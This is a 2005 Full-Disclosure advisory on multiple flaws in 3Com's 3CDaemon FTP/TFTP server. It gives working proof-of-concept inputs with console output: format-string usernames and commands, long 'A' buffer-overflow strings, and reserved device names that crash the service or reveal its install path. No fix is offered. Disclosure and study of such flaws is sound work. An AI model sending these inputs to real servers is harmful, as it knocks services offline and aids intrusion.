[Full-Disclosure] 3Com 3CDaemon Multiple Vulnerabilities

From: Sowhat . (smaillist_at_gmail.com)
Date: 01/04/05

  • Next message: Steven: "[Full-Disclosure] AOL's Online Password Reset feature does not fully validate user information"
    Date: Tue, 4 Jan 2005 18:23:06 +0800
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    
    

    3Com 3CDaemon Multiple Vulnerabilities

    By Sowhat
    04.JAN.2005

    http://secway.org/advisory/ad20041011.txt
    [I.T.S] Security Research Team

    Product Affected:

    3Com 3CDaemon 2.0 revision 10

    Vendor:

    www.3Com.com

    (1) BACKGROUD

    3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows

    platforms, developed by dan_gill@3Com.

    For more information,
    http://support.3com.com/software/utilities_for_windows_32_bit.htm
    ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

    3CDaemon is full of holes,ISS and Wang Ning <nwang@scn.com.cn> has already

    reported some bugz about 3CDaemon
    (see: http://xforce.iss.net/xforce/xfdb/8970
            http://www.securityfocus.org/bid/11944
    )

    And I doucument some other well-known bugz here again :)

    (2) Details

    Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows
    attackers

    to execute arbitrary command as the user running 3CDaemon (usually

    Administrator).Some of these Vulnerabilities didnt need a valid username and

    password to login.

    There are several vulnerabilies

    1.TFTP Reserved Device Name Denial of Service

    D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
    The 3CDaemon will be crashed with some msgs like
    "Microsoft Visual C++ Runtime library"
    "Runtime Error!"
    "Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
    "abnormal program termination".

    2.FTP Username Format String vulnerability

    H:\>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)): %n
    Connection closed by remote host.

    OR:
    H:\>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)): %s
    331 User name ok, need password
    Password:[anythinghere]
    530 Login access denied
    Login failed.
    ftp>

    And then the 3CDaemon is dead.

    3.FTP long Username Buffer overflow

    D:\WINDOWS\system32>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)):
    501 Invalid or missing parameters
    Login failed.
    ftp> user AAA..[about 241 A here]...AAAAA
    Connection closed by remote host.

    4.Multiple FTP command long parameter Buffer overflow
    Including:cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on
    (Maybe this is what ISS's Advisory talking about)

    ftp> cd AAA..[about 398 A here]...AAAAA
    Connection closed by remote host.
    ftp>

    ftp> ls AAA..[about 247 A here]...AAAAA
    200 PORT command successful.
    Connection closed by remote host.

    ftp> put 1.txt AAA..[about 247 A here]...AAAAA
    200 PORT command successful.
    532 Need account for storing files
    Connection closed by remote host.

    It seems that the length of the "A" is different from every command.

    5.Multiple FTP command Format string
    Including:cd,delete,rename,rmdir,literal,stat,CWD, and so on

    230 User logged in
    ftp> cd %n
    Connection closed by remote host.
    ftp>

    6.Multiple FTP command Reserved Device Name Information Leak
    Including cd,and so on

    The following command will disclosure the physical path of the 3cdaemon

    ftp> cd aux
    550 aux : C:/3cdaemon/aux is not a directory!
    ftp> cd lpt1
    550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

    and also ,CD an exsiting filename will disclosure physical path too.

    ftp> cd toolz.rar
    550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!

    There are still some other boring bugz ,but it's enough : >

    (3) WORKAROUND

    Workaroud ? No......

    (4) Vendor Response

    Since it seems that 3com didnt maintained 3CDaemon for a long long time ,I dint
    contact them :)

    http://secway.org
    Thank to all the members of ITS Security Team
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Steven: "[Full-Disclosure] AOL's Online Password Reset feature does not fully validate user information"

    Relevant Pages